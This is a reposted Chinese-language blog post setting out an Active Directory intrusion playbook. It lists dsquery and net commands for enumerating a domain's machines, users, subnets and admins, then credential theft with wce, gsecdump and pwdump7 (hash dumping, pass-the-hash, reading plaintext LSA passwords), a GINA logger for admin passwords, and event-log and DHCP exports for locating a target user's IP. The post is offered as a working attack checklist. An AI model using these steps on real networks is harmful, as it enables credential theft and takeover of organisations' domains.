AD域 通過日志分析可確定目標IP,進一步精確打擊。偷渡者


這樣導出日志分析的,可以快速定位目標,而且產生的日志比較小,基本不用考慮日志問題。在今天跟anubis_zcl的討論中還理解到一些新的東西。明天再補充。
一、獲取域內信息
 
1、列出該域內所有機器名(dsquery computer domainroot -limit 65535 && net group “domain computers” /domain)
2、列出該域內所有用戶名(dsquery user domainroot -limit 65535 && net user /domain)
3、列出該域內網段划分 (dsquery subnet)
4、列出該域內分組 (dsquery group && net group /domain)
5、列出該域內組織單位 (dsquery ou)
6、列出該域內域控制器 (dsquery server && net time /domain)
7、列出域管理員帳號 (net group “domain admins” /domain)
 
二、分析域內信息確定目標
 
通過上述收集到的信息,我們可以分析出很多重要信息例如:每個分組下面都有哪些用戶、機器(net group 組名 /domain && dsquery
 
“ou信息”)文件服務器,郵件服務器以及目標所在位置等。
 
三、域內滲透
 
1、抓取hash破解密碼 (gsecdump、wce、pwdump7、gethash等)
2、hash 注入 (wce -s)
3、讀取lsa明文密碼 (wce1.3 -w 、 gsecdump -a)
4、0day溢出(smb、rdp、dns、rpc 等)
5、安裝gina 記錄管理員帳號密碼
6、hd 掃描弱口令等
 
通過以上方法獲取域控制器權限
 
四、確定目標IP
 
1、確定目標用戶登錄日期 (net user aa /domain)
2、導出該日期域控制器登錄日志 (cscript eventquery.vbs /fi “Datetime eq 06/25/2012,03:15:00AM/06/25/2012,03:15:00PM”
 
/l Security >c:\xxx.txt)
 
3、導出DHCP配置(netsh dhcp)
 
通過日志分析可確定目標IP,進一步精確打擊。
 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM